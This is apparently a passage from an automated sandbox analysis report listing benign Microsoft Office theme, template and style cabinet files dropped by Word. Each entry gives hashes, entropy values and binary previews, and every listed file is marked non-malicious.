                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):21111
                                                  Entropy (8bit):7.6297992466897675
                                                  Encrypted:false
                                                  SSDEEP:384:wWZsOvbMZGgbA8E0GftpBjEtnFLrHRN7Dfll7PK/pirk:xZRvuzA8Pi6t9DPISk
                                                  MD5:D30AD26DBB6DECA4FDD294F48EDAD55D
                                                  SHA1:CA767A1B6AF72CF170C9E10438F61797E0F2E8CE
                                                  SHA-256:6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF
                                                  SHA-512:7B519F5D82BA0DA3B2EFFAD3029C7CAB63905D534F3CF1F7EA3446C42FA2130665CA7569A105C18289D65FA955C5624009C1D571E8960D2B7C52E0D8B42BE457
                                                  Malicious:false
                                                  Preview:MSCF....g.......D...........................g....?..........}.......................TabList.glox.................Content.inf....t....[......@..C...../.U5...........6...`.....T..>3.................=..09`..t......a..Y..BI.Z....=.'0...%...T..........H...>.:A.r......n..p...Pf.h...I.8... ....M.]&.#.vv'.....[c......g....>"......<c..f....i...sb!Z..iu<.%|......q.....G28.h-...7.....W.v...RtdK..F~.0.3.'.e..b7.c......a.3.....a\..]...gp8.+.u/}.w.qF........8.=.=|....\~..S.-q}]0...q.B.H.^J...!...a'.2Tn!..."..%........=.e_-.....{o..%o...a`.w..L.5..r.....e.8...pO..RE.Wgr..b.%.E...O.......8s...E....Um].C..M.....[...H.FZ..4...eZI.$..v.3<]..r....B..............8i......e<.D...Q4.q.^S.....H.b.......r.q..0o.......2..PP,."...JI...xU`.6f..K..Q9.Q..h..t....AI.S6...7............X..`dv..r..S....),7ES....#.....(...\.nh...X.ps%l..F...."<_....q....v........_.e.....P.........|&..fi..4..@..^0..v.]7.......^. ."..}(...w.g.X...=<....p.......L...P..XV....@:....N...Y....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):33610
                                                  Entropy (8bit):7.8340762758330476
                                                  Encrypted:false
                                                  SSDEEP:768:IlFYcxiahedKSDNAPk5WEEfA8Pi6xnOKMRA58:2JitdKsNAM5WBDP7xOKMq58
                                                  MD5:51804E255C573176039F4D5B55C12AB2
                                                  SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                                                  SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                                                  SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                                                  Malicious:false
                                                  Preview:MSCF....:D......L...........................:D...?..................XC.....................chicago.xsl. ...............Content.inf.!..B...[...H."m..3C.6...WP!i/Z..vn._...^omvw+...^..L.4o...g..y......^..x...BH.B.K....w.....F........p ./gg.h.0I',.$..a.`.*...^..vi..mw..........K....oQ............P...#...3.......U(.=...q.~?..H..?.'I4'.......X...}w.vw.....f.n..f{3.....-....%dK&q..D.H.Z..h-..H.[$ %.."..e....1...$.............'.....B..%..4...&`S!DQ...M.......N~............S..'....M..4E.^..dej..i..+.`...6F%sJ....Q..d.(*.s.Z...U-5Eh.s.CK...K..X$......j..T.?.`.|...=..R...-7...*...TU.....7a...&I.noOK|.W.R-+S.d..rR.....{h.Y...)..xJ..=.XM..o...P'.I4m..~I..C..m.....f.....;{Mzg+Wm.~...z...r-.....eK...lj:^.1g5...7.h(T"..t?5......u.....G.Z<..sL.\{...8=t...Z...'tps.:...|....6.....S..X...I...6l.M.....aq.;YS....{:.&.'.&.F.l...\.[L.%.so\.v.Lo...zO.^^...p..*9k...).CC..F0>L...VUE4.......2..c..p.rCi..#...b.C@o.l.. E_b..{d...hX.\_!a#.E.....yS.H...aZ...~D3.pj: ss?.]....~
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):34816
                                                  Entropy (8bit):7.840826397575377
                                                  Encrypted:false
                                                  SSDEEP:768:i3R9VYnIYfPYmqX0CnF1SRHVnLG8Pi61YbEIFO:ih9VjYfPYlk+F1SJxP71YbEIFO
                                                  MD5:62863124CDCDA135ECC0E722782CB888
                                                  SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                                                  SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                                                  SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                                                  Malicious:false
                                                  Preview:MSCF.....H......L............................H...?...................G......................APASixthEditionOfficeOnline.xsl.H...............Content.inf..h;.....[...Q..\..3S.5..oVP!i/Z.Ls...]q$...xY..+W.qm..B..y/.5.s..x$../K./.x.$.....}.......\........LNf..Hd.&."Ip.L.Mr-@.D..kW~i...^.....F.....T.U....../..0..2.{.q.T.`'{.00.{.B...>.R..2....1.~_.f..s...........~....~[..v..w..v....$[K.r$#[6...d;[...#.9.-...G..Z..eAR.0")%JI?&....$..$.H..$(........f.> k....hP...p...!j.T......l7..../3..(2^V...#..T9...3.@[0...le:...........E....YP.\.....au1...\.S|..-.duN.Z..g.O......X8....1.....|,.f/..w.|Wk]zJz.g'./7h..+.....}............x....s.2Z\..W.{...O....W.{j.U..Q....uO=.p.M k.E.S{SUd.@....S.Syo8>......r......8..............Z?>.mUAg....?o....f.7..W.n...P..........d.S?...\..W`...c.ua..........#.Y...45...F(d.o\09^..[.}...BsT.SD..[l.8..uw.7l..S.9T.KR..o......V..]...M .....t.r...:P...M....4.F.....@..t.1t..S...k.2.|5...i.%H..<.J..*.0n.....lZ.....?.*?.~..O .)..
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):42788
                                                  Entropy (8bit):7.89307894056
                                                  Encrypted:false
                                                  SSDEEP:768:Hx+UzBiwDQTXgBm029ClGn4BZz6i5kIew/jG8Pi6lYJz1gH:0ZXc29eGn2n5klwjxP7l2z1gH
                                                  MD5:21A4B7B71631C2CCDA5FBBA63751F0D2
                                                  SHA1:DE65DC641D188062EF9385CC573B070AAA8BDD28
                                                  SHA-256:AE0C5A2C8377DBA613C576B1FF73F01AE8EF4A3A4A10B078B5752FB712B3776C
                                                  SHA-512:075A9E95C6EC7E358EA8942CF55EFB72AC797DEE1F1FFCD27AD60472ED38A76048D356638EF6EAC22106F94AFEE9D543B502D5E80B964471FA7419D288867D5D
                                                  Malicious:false
                                                  Preview:MSCF.....h......L............................h...?..................@g......o...............Element design set.dotx.................Content.inf.Y/..Re..[......f........,..]....D.],....]..X.......XC4pE.....p........2..u;L.N.....]G..d.^d.$).e.=..;..Kb.../.../....H.."...w$._I..5.....a..4.Gd5p......v.8..1..%H..\..e...3.e..A..).d*.. . (.8.".......(>..<...@...~*v&.f..LWhqk]+Uep.d..%...o.....k.......e...nNN.&_.>.d.?H`"...r?..Z.p..q..<M.N.t....{*.y]#...._XW"qI...x.......}.. .N...;.}:..m8...[.r.F....^?...o...u..*...J3.V....~...~tn#.Kf6.s.|*..,s...M.$.f..?Yu.pE.1_wU...%....._..'..Z......y:.{.J5..7..Q.w}/.~.-3~Ctw=..IT.....mI.u@...y.M....2.%...y...Y..j.k<-.Q.r...7m..b...+.6..|.....U..}[...,....^....5..D..qW...[3).p.Y<.Hh..t...%cw=Z..W.~W.F....zr.4.g...O...P.g_^..3.-............3s...S..y...u...N...EsJz....tT../..c[w{cG....../6.....:.W<d5}.q..s..K"$........Ne..5..#.v'..n4.rj....Fc=....5..VN.....6..9`....|..........WX..-?..........W.)^`1.......].R2..s6...H.......
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):307348
                                                  Entropy (8bit):7.996451393909308
                                                  Encrypted:true
                                                  SSDEEP:6144:7vH3uG+yiWx0eVJyORloyyDqnHefzOs81MrXLXx7:b36yiWH/LRS2CJl1
                                                  MD5:0EBC45AA0E67CC435D0745438371F948
                                                  SHA1:5584210C4A8B04F9C78F703734387391D6B5B347
                                                  SHA-256:3744BFA286CFCFF46E51E6A68823A23F55416CD6619156B5929FED1F7778F1C7
                                                  SHA-512:31761037C723C515C1A9A404E235FE0B412222CB239B86162D17763565D0CCB010397376FB9B61B38A6AEBDD5E6857FD8383045F924AF8A83F2C9B9AF6B81407
                                                  Malicious:false
                                                  Preview:MSCF....tq......D...........................tq.. ?..........|..................Mn. .Banded.thmx............Mn. .content.inf..;.u.i..[...............?....^.j.{j.B...$M/!...W....{!..^0x/.6...&............w......$.B..J.?a.$=...P..L...d..........+./.\..E:h.....-.$..u-.I..L\.M.r..Y..:rtX:....8...........+8.}{......&.-..f.f..s3-P.''.r...Z-"/E../...^%^N(,.$..$.H..O........q>...|.|......y..m.)u....`.....z.n..-.[.5....xL....M...O..3uCX..=4.....7.yh...dg.;..c.x.4..6..e..p.e"..,.!.St{..E..^I.9j....;..`.Y..#.0..f...G.....9~./....QCz.93..u%hz.........t9.""........)..7K.c~E!..x.E.p...[......o..O.j.c.......6.t{...".....t9V;xv....n<.F.S2.gI.#6...u..O..F.9.[.L.....K....#..zL..I...o....k...qog.......V..BKM..#.bET.)..&4..m.w...*....E.a[.Q.y.B...w...r.nd...)...<..#..r[4.y...#.z.....m?.2K.^...R{..m..f......r?]..>@...ra$...C+..l].9...."..rM9=......]".'...b&2e...y..a..4....ML..f...f"..l..&.Rv=2LL..4...3t_x...G....w..I.K....s.t.....).......{ur.y2...O3.K*f.*P(..F..-.y.Z...
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):222992
                                                  Entropy (8bit):7.994458910952451
                                                  Encrypted:true
                                                  SSDEEP:6144:k8/c2cF9GTLqsTmYstUdx+dwb2ooiVOfiI17zWbQ:jbzqGdpbZ/Mf3h68
                                                  MD5:26BEAB9CCEAFE4FBF0B7C0362681A9D2
                                                  SHA1:F63DD970040CA9F6CFCF5793FF7D4F1F4A69C601
                                                  SHA-256:217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767
                                                  SHA-512:2BBEA62360E21E179014045EE95C7B330A086014F582439903F960375CA7E9C0CF5C0D5BB24E94279362965CA9D6A37E6AAA6A7C5969FC1970F6C50876582BE1
                                                  Malicious:false
                                                  Preview:MSCF.....'......D...............]............'..H?..........z..................M{. .content.inf..l.........M{. .View.thmx......R..[...........@...G...I..(J.....B....Q!....}Ju..(BR..._|.5.%.....6m...........?.w{.rm,....#....;Ba#.:v...Dv.."u.v{!...f}......!......:.S.......".z.f.......==.n.0Km0eh.Kbm.C.r.6.........d..h.....{..w..}....2sb...rvm..x...0(..B... ...BH.r#.@..d".*..F+...Q.sx.....?...d.d.eZ2W2.2d...q.I....4.e4....#.....K...3...1.p.y......>.~V....cm....n^..b.{..._D?..AG...'...k.L&..h}=p.....Wl....(.......>.~.].....'.4.W{......../......7.....'.s...w...6..hn..e.2.).l]u.v4...GF.X..X..X....G.i.\..y.g&.<&ti......Sp,j.....>I..S..%.y..........S..-).+...>...D..............[...d...jt.~<x.a(.MDW..a..ZI.;+..!,.$...~>#...).R4...K.$.Zm......b...........{..._..A{.}..r...X...T.ZI.T.).J...$.".U,.9...r.z.)......}...()<....m....QS.p...;?..5.W~2r.EZu..P.1.%'l.........+/6.Mm.|2....Ty..f.o.S.....3J.._...X,..m....:..1.<GqFy.QA9W4.=....n...ZP...O.\.[...:8.%.^..H.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):261258
                                                  Entropy (8bit):7.99541965268665
                                                  Encrypted:true
                                                  SSDEEP:6144:9blShNYrHNn0JU+D+kh8CIjXHWC7X0nZLC9Ge2KY/WfI:9ZSTYrtn0Sk+CIDHWC7chVKYx
                                                  MD5:65828DC7BE8BA1CE61AD7142252ACC54
                                                  SHA1:538B186EAF960A076474A64F508B6C47B7699DD3
                                                  SHA-256:849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF
                                                  SHA-512:8C129F26F77B4E73BF02DE8F9A9F432BB7E632EE4ABAD560A331C2A12DA9EF5840D737BFC1CE24FDCBB7EF39F30F98A00DD17F42C51216F37D0D237145B8DE15
                                                  Malicious:false
                                                  Preview:MSCF............D...............nJ...............D.................."..........M. .content.inf....."......M. .Metropolitan.thmx...cVtP..[.....`Q..B.....=.T.....h.."...Z..|..}hZK.V....Z..Z................?..v...[S$."...H......^u.%.@...>....... f.........1.5......*&lm.tZ.msz:...Noc....1....D .........b..... ..3#pVp....}oo]{m......H*[%i.GNHB1D<......(*# ....H"....DP..b(B.<.....v......_..`.7..;.}............/.p}.:vp....~l0..].........S....G?.....}..U.;......dNi..?........-c..J.z....Z...._.O.....C..o.,......z....F....sOs$..w9......2G..:@...'....=.....M..am.....S......(`.._....'......[..K"....BD...D...^1k.....xi...Gt....{k@.W.....AZ+(,...+..o......I.+.....D..b. T.:..{..v.....g..........L.H.`...uU~C.d...{...4.N.N..m8..v.7..3.`.....,...W...s.;.fo.8.Y...2.i...T&.-...v8..v.U.Y=...8..F.hk..E.PlI.t.8......A.R....+.]lOei..2...... gS*.......%8H.....<.U.D..s.....>.....D_...../....l.......5O1S~.........B.g.++cV.z.f .R.Z.......@6....(..t^5"...#G...
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):271273
                                                  Entropy (8bit):7.995547668305345
                                                  Encrypted:true
                                                  SSDEEP:6144:zfdvQnJMwXse4Vradf3mrC7woyWbjKlCVC7K:zfJwJse4VrS1AK
                                                  MD5:21437897C9B88AC2CB2BB2FEF922D191
                                                  SHA1:0CAD3D026AF2270013F67E43CB44F0568013162D
                                                  SHA-256:372572DCBAD590F64F5D18727757CBDF9366DDE90955C79A0FCC9F536DAB0384
                                                  SHA-512:A74DA3775C19A7AF4A689FA4D920E416AB9F40A8BDA82CCF651DDB3EACBC5E932A120ABF55F855474CEBED0B0082F45D091E211AAEA6460424BFD23C2A445CC7
                                                  Malicious:false
                                                  Preview:MSCF....Q.......D...............y...........Q...XJ..........{..................M.. .content.inf.(..........M.. .Frame.thmx.1....b..[.........B.....6....ZZ}....BH..-D..}..V.V-........Z..O.....H.f..........;..@d.`......!..=;.,bp..K.q....s.y....D.qZ)p......D...r.S....s=B.4.).8B....4.a6 ...~........."....#.....}....n.Q.1cH.%c/.U....E..E...!..Da*.p....X..G..:.....1.@.....W.'...._........W.c...<.v.k.....&.8......?.h.>d._:-.X.......9..tL}........3.;.N3.D~......>.^?..|:...}......oT.z.......w..[..}:...._fu........Kk.......L..9..p..e..^......K.%...Mapqhvv..E&.^.....[...9|"l...9...U......!..w..Nya...~C.yx...w.K..q.z.j.W?t.......DY.x.S2.....]..na.Qj...X.K..^...S.hK.W...Z....s.0...NF...8C.......j.'Zc...k.%...l....S.....OW..o.Qf.x...X.;<.rO].....W.m.e....T.1.6........".....Q.3........l..v.."..I...&......w..4vE...c.s[.3.m..8.q$.....a...)...&:6..,..#..?....;.!.....~.UP.r=.}h.&U......X...]..X.e\u.G<....E....lG.@.*Z...10.D@.]....z+-.S....p..Y.PK.:.S..p.....1E`..-
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):295527
                                                  Entropy (8bit):7.996203550147553
                                                  Encrypted:true
                                                  SSDEEP:6144:nwVaEqsf23c9shf6UyOGgDWDn/p3fd+zkPWnvGL3n9bQnkmVheyqtkl:MlPfW6sVEDn/pPdhWnvGL36zyyqal
                                                  MD5:9A07035EF802BF89F6ED254D0DB02AB0
                                                  SHA1:9A48C1962B5CF1EE37FEEC861A5B51CE11091E78
                                                  SHA-256:6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674
                                                  SHA-512:BE13D6D88C68FA16390B04130838D69CDB6169DC16AF0E198C905B22C25B345C541F8FCCD4690D88BE89383C19943B34EDC67793F5EB90A97CD6F6ECCB757F87
                                                  Malicious:false
                                                  Preview:MSCF.....B......D...............P............B..p?..........{.................M.. .Basis.thmx...........M.. .content.inf.`g..td..[...............5..$..WM.....R.......H\.+\./^...x.^..h..MU..\........v........+......g...$.......g.....~....U].7..T..1k.H...1...c.P.rp.6K..&......,.............U4.WoG.w.....;.....v..922.;]..5_-]..%E]b..5]... (..H..II..ttA4Q..BI!|...H.7J.2D....R.......CXhi`n....6..G.~&.[..N...v..Z"t.a..K..3..).w...._@.}.}.v.......4......h....R;.8.c&.F...B^....Q.....!Bm2...F.`.......M;...#.{....c...?...e...6t..C.-.E.V.v%I..H.....m.n...$D.....vU'.....=6}~...Gw...Y..?.@......G.....k......z...5d.h......1.}..O*;e..t......Y.0...3.v).X.-.2.....~....14.[.w=I....hN....eD..7G.u.z..7.do..!....d..o.wQ.:....@/.^..<e.-..=\.....6.C.'.rW$..Cp.M3.u6z......Q.F.9.5....juc..I...m4]7L....+n......).t......2[.3.p.:.....O5y..wA........^..!..H....{..S.3w.!&.'.;...(..|m.x.S..Z.j..3...n..WU...../w.......xe=.+.D...x..qy.S.....E..... ...uu.`.,..<.6[p
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):276650
                                                  Entropy (8bit):7.995561338730199
                                                  Encrypted:true
                                                  SSDEEP:6144:H2a+HFkDF8gpmMt4kzwVVqhSYO6DITxPWgJl1CFExwXyo7N:mlZgFtIVVTuDExeWuv7N
                                                  MD5:84D8F3848E7424CBE3801F9570E05018
                                                  SHA1:71D7F2621DA8B295CE6885F8C7C81016D583C6B1
                                                  SHA-256:B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A
                                                  SHA-512:E27873BFD95E464CB58B3855F2DA404858B935530CF74C7F86FF8B3FC3086C2FAEA09FA479F0CA7B04D87595ED8C4D07D104426FF92DFB31BED405FA7A017DA8
                                                  Malicious:false
                                                  Preview:MSCF............D................................D..........~..................M. .content.inf............M. .Dividend.thmx..).}.b..[.....`.........?.R...T../..............4..yy....{...f.h..\U......sy.gV0Q.@..A..@..3a.A}........7.q.......8......R....sJ)E..ENr.S*B.1..).s.r.J.D.b."..........(.....E$.V........y.5.L....;gY..QK/nni..x..3.<..Q.Q..K.I.....T.z.,F.....{.p.....;8._.&../...........X...}.;[Gk..._.i`m.u.?...s.w...4.....m......l....5..n.?..c..m...,.....{.k.?......sC.............e..1....oL.8./......1._.K:.]..&......O............qo.....Dd/c...6.q.*......V.v........h....L..h..C+..V..;O.(7Z]{I%....S3.{h....\...b.......5.ES......Z.4...o.c`..YA....9i....M.s....Z3.oq`....>.i..@.@n.a...x.3.zp.<....vU/.|^CvE...aD.P&mhvM>.p..B~....."._.......v-.m..w..?._..=...:...k....i.}x.6....Y.i..n....h...j......LZ.....fk..f0.y.T..Vl.;...s.......B6.f.'z.c.\W?...4U)..aJ.;O....L.d7.J.V#Q.....\J.F.?].d}!..y].6..%..~....|......5...'N.#.....t6.,.E.O."..0fyz....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):230916
                                                  Entropy (8bit):7.994759087207758
                                                  Encrypted:true
                                                  SSDEEP:6144:OTIPtMXmJWnzPS3pqnkeuJXW+FNx1a72rLiQxEBTR:750nz63/FJRFLISnp+Bt
                                                  MD5:93FA9F779520AB2D22AC4EA864B7BB34
                                                  SHA1:D1E9F53A0E012A89978A3C9DED73FB1D380A9D8A
                                                  SHA-256:6A3801C1D4CF0C19A990282D93AC16007F6CACB645F0E0684EF2EDAC02647833
                                                  SHA-512:AA91B4565C88E5DA0CF294DC4A2C91EAEB6D81DCA96069DB032412E1946212A13C3580F5C0143DD28B33F4849D2C2DF2214CE1E20598D634E78663D20F03C4E6
                                                  Malicious:false
                                                  Preview:MSCF.....F......D................g...........F...?..........|..................L.. .content.inf.zG.........L.. .Parcel.thmx.>2...R..[...0...........7....B+...BH....{...^.../.....B{...1....+".....<.....$........{.......sD"..j...}... P..w..U..f...6.x8. ...C..F.q.7....T.6p......B.P..L..g......A..43.W`.....{{...u.4...:.bb.4"X..m..)$..@(H. H.tBPTF..,.&.B.'...6..2...n..c%...Z@.(.@.......(.<i.i....P......?......o.......F.M.L......i.....C..7..../.....MQ.0..l.U.s.Fu.......1...p.;.(.}..ogd..<.._.Z......._.......O.J......97...~<...4.c....i..........'k.5.......Q.$..C..E... ..5.7....N.a.[ns6hi..kM....?....X......*9q...!O\....0....n.^s.9.6..............;. ..r...rf..C6z..v #.H...O...v/.sl....J.m%.L.Dp.e....*uO..g.y....f...].5.*........W.....h^[..w.|.=.ru.|.M..+.-.B...D.Ma....o.<X SnI....l...{..G..,..y5\W.@..y.;.y ...M..l.....e..A...d.e!.E..3.......k1.......6gY).../....pQ..?..s.W.)+R.S5..../.0..vz.^.......k.....v..9..A.NG...N~#..$.B...*s,(.o.@.ar.!.J.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):550906
                                                  Entropy (8bit):7.998289614787931
                                                  Encrypted:true
                                                  SSDEEP:12288:N4Ar9NyDhUQM0Hk86V1YnOIxQ9e6SJbj2OjK:jAG8wa5Qw6SZ2Oj
                                                  MD5:1C12315C862A745A647DAD546EB4267E
                                                  SHA1:B3FA11A511A634EEC92B051D04F8C1F0E84B3FD6
                                                  SHA-256:4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0
                                                  SHA-512:CA8916694D42BAC0AD38B453849958E524E9EED2343EBAA10DF7A8ACD13DF5977F91A4F2773F1E57900EF044CFA7AF8A94B3E2DCE734D7A467DBB192408BC240
                                                  Malicious:false
                                                  Preview:MSCF....*#......D...............Q...........*#...D..........~..................M{. .content.inf............M{. .Parallax.thmx.9... y..[......(..b.P...E.Q*.R.".RTH.%.T..F......u.{.*+.P.....FK*0].F...a{...D4`D..V.../.P,....2.Mx...u......0...E...{A-"J...)jl_.A..T......u.Y....ZG:....V.A.#~.. ..6..............o..X..<.... .......C.ce.f!nA.).p...p........n..................'6w6H6s.j....l...{?.h..........]..l.....v....%..l}A..................3...W_73.j......6...F.../..qG.?........H..).........7.&km....`m2..m.W.q.<../~<..6*.78..X~.e+..CC*w...T...6....AB..l..._.f......s.e....2....H..r.R.Z....a.,..\Q.q..._SJJ....7.S.R....=f..>....9=....NnC.....].-...\..Z..q..j...q.....Nj..^'..k...Zl.~PRvpz.J..+.C...k.z.w=l.#.............n...C..s.kM.@B{..vL.e....E..(/......f...g..=..V...}...).=s.....y!.,...X.[..[.....\31}..D%...%..+G66.j.v./.e9...P;.o.y..U+...g.g.S.../..B._L..h...Oi.._...:..5ls>>........n6.F.Q..v>..P.r:.a..Z....a...x..D....N...i..=L.u......<;Nv.X/*.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):723359
                                                  Entropy (8bit):7.997550445816903
                                                  Encrypted:true
                                                  SSDEEP:12288:NPnBZX7wR3tMwYqNDQGnXTtfzO5U7yo6O7bLhe8yE3LLDok4a:JBMbYE7xzO5U917bLh/DL3oJa
                                                  MD5:748A53C6BDD5CE97BD54A76C7A334286
                                                  SHA1:7DD9EEDB13AC187E375AD70F0622518662C61D9F
                                                  SHA-256:9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351
                                                  SHA-512:EC8601D1A0DBD5D79C67AF2E90FAD44BBC0B890412842BF69065A2C7CB16C12B1C5FF594135C7B67B830779645801DA20C9BE8D629B6AD8A3BA656E0598F0540
                                                  Malicious:false
                                                  Preview:MSCF....?.......D...........................?...`J..............3..............M.. .content.inf..+.........M.. .Wood_Type.thmx......r..[.........................!.wwwwqwwwwwwwwwww..."....+......nR..x..\..w..r.5R.....(|.>.$e3.!..g....f..`9NL......o./.O.bxI...7.....|........6.n."J.....4^g.........?...................o.......s3.....8. .T.j...._.Z.Q.t.k,(o.c.t.......?Z....`o........?.a....6.)....6b..../.t...........Mz....q}......C.......+{.......o...K.tQjt............7.._....O.....\....` ..............@..`....%..t....V.]........m..m....u..1.yr;..t..F.'..+{....zqvd.g._..$H..Vl...m..../....g..rG.....:*......8....h...[...a06...U.W....5.Z.W..1I..#.2.....B3...x....$PRh...\{J.c.v.y..5+Y.W.N..hG......<..F..W.d8_....c...g....p|7.]..^.o.H.[$Zj..{4......m.KZ..n.T%...4.Z..Y."q7?kuB......U....).~.......W%..!.e.U.mp.o...h...?.w...T.s.YG#......Y.}....Z.O.i.r,...n..4.\....P..m..=....f........v....g....j...*.wP..4.VK.y.z...C..oum.b.1......?.Z.>.7.!?......A..Q>..Z....-
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):640684
                                                  Entropy (8bit):7.99860205353102
                                                  Encrypted:true
                                                  SSDEEP:12288:eV7ivfl+kbkIrWu+2aoRjwv/cSUWauGPo2v65s4QqcT3ZCCz6CSj8aC:fdhr1+3y4MWaC2CO4V+3ZCCDsO
                                                  MD5:F93364EEC6C4FFA5768DE545A2C34F07
                                                  SHA1:166398552F6B7F4509732E148F93E207DD60420B
                                                  SHA-256:296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899
                                                  SHA-512:4F0965B4C5F543B857D9A44C7A125DDD3E8B74837A0FDD80C1FDC841BF22FC4CE4ADB83ACA8AA65A64F8AE6D764FA7B45B58556F44CFCE92BFAC43762A3BC5F4
                                                  Malicious:false
